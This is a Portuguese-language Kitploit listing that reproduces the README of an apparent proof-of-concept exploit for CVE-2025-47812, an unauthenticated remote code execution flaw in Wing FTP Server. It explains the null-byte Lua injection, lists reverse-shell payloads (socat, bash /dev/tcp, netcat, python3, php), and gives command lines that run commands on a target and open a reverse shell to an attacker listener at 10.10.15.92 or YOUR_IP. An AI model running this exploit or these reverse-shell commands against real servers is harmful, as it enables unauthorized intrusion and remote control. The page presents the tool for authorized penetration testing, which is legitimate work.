Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-47812-PoC — Exploit de execução remota de código não autenticada para o Wing FTP Server (CVE-2025-47812) com múltiplos payloads de reverse shell, modos interativo e CLI, e tratamento automatizado de sessões. | Kitploit
Ferramentas/GitHubGitHub/havbay/cve-2025-47812-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

Exploit de execução remota de código não autenticada para o Wing FTP Server (CVE-2025-47812) com múltiplos payloads de reverse shell, modos interativo e CLI, e tratamento automatizado de sessões.

1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
Compartilhar

CVE-2025-47812 — Wing FTP Server Execução Remota de Código (RCE)

Python CVSS Type

Visão Geral

CampoValor
CVECVE-2025-47812
AfetadoWing FTP Server < 7.4.4
TipoExecução Remota de Código sem Autenticação
Pontuação CVSS10.0 (Crítico)
Corrigido emWing FTP Server 7.4.4

Como funciona

A vulnerabilidade existe no endpoint de login /loginok.html. O servidor não sanitiza bytes nulos (%00) no campo username. Isso permite que um atacante injete código Lua arbitrário em arquivos de sessão, que são posteriormente avaliados no lado do servidor quando endpoints como /dir.html são acessados — sem exigir nenhuma autenticação.

Referência: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


Recursos

  • Execução de comandos sem autenticação
  • Múltiplos payloads de reverse shell (socat, bash, python3, nc-e, nc-fifo, php)
  • Payload socat priorizado para TTY interativo completo
  • Verificação prévia de acessibilidade do alvo
  • Extração automática do UID da sessão com nova sessão a cada tentativa
  • Escolher um payload específico com a flag --payload
  • Salvar a saída do comando em arquivo com -o
  • --timeout e --delay configuráveis
  • Modo verbose/debug com -v
  • Tratamento gracioso de Ctrl+C
  • Resumo do payload após tentativas de reverse shell
  • Modo de argumentos CLI + menu interativo
  • Saída com código de cores

Requisitos

root@kitploit:~
pip install requests

Uso

Modo interativo

root@kitploit:~
python3 wingftp_rce_exploit.py

Modo CLI

root@kitploit:~
# Executa um comando
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Salva a saída em arquivo
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (tenta todos os payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (payload específico)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

Todas as opções

root@kitploit:~
-u / --url        URL base do alvo
-U / --username   Nome de usuário de login (padrão: anonymous)
-c / --command    Comando a executar (modo comando)
-r / --rhost      IP do seu listener (modo reverse shell)
-p / --rport      Porta do seu listener (modo reverse shell)
     --payload    Payload específico a usar (veja a lista abaixo)
     --timeout    Timeout de requisição HTTP em segundos (padrão: 10)
     --delay      Atraso entre tentativas de payload em segundos (padrão: 4)
-o / --output     Salvar saída do comando em arquivo
-v / --verbose    Habilitar saída de debug

Payloads de Reverse Shell

NomeMétodo
socatPTY completo via socat
bashRedirecionamento /dev/tcp
python3Subprocesso de socket
nc-eNetcat com flag -e
nc-fifoNetcat + mkfifo
phpPHP fsockopen

Exemplos

Execução de comando

root@kitploit:~
URL do alvo : http://192.168.1.10:5466
Usuário     : anonymous
Opção       : 1
Comando     : whoami

Reverse shell

Passo 1 — Inicie seu listener (socat recomendado para TTY completo):

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

Ou com nc:

root@kitploit:~
nc -lvnp 4444

Passo 2 — Execute o exploit:

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

Créditos

  • PoC original por blindma1den
  • Melhorado e estendido por Havbuy

Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais e a testes de segurança autorizados.
NÃO use contra sistemas que você não possui ou para os quais não tenha permissão explícita por escrito para testar.
O uso não autorizado é ilegal. Os autores não assumem responsabilidade pelo uso indevido.

Baixar ferramenta